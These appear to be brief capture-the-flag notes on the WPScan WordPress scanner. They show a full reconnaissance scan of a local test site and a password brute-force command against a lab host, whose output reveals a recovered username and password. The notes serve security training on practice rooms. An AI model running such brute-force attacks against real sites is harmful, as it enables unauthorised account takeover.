https://wpscan.com/wordpress-security-scanner
Source code on GitHub: https://github.com/wpscanteam/wpscan
# wpscan --url http://127.0.0.1:8080
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.14
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://127.0.0.1:8080/ [127.0.0.1]
[+] Started: Sat Mar 13 09:41:21 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://127.0.0.1:8080/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://127.0.0.1:8080/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://127.0.0.1:8080/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.9.5 identified (Insecure, released on 2018-04-03).
| Found By: Emoji Settings (Passive Detection)
| - http://127.0.0.1:8080/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.5'
| Confirmed By: Meta Generator (Passive Detection)
| - http://127.0.0.1:8080/, Match: 'WordPress 4.9.5'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <===========================================> (22 / 22) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Mar 13 09:41:32 2021
[+] Requests Done: 47
[+] Cached Requests: 4
[+] Data Sent: 11.353 KB
[+] Data Received: 122.766 KB
[+] Memory used: 193.074 MB
[+] Elapsed time: 00:00:11
#
Brute force password
# wpscan --url http://10.10.87.140/wordpress -U elyana -P pass2.txt
...
[!] Valid Combinations Found:
| Username: elyana, Password: H@ckme@123
...
Practice
>>> THM | Badbyte
>>> THM | Wekor
>>> THM | Internal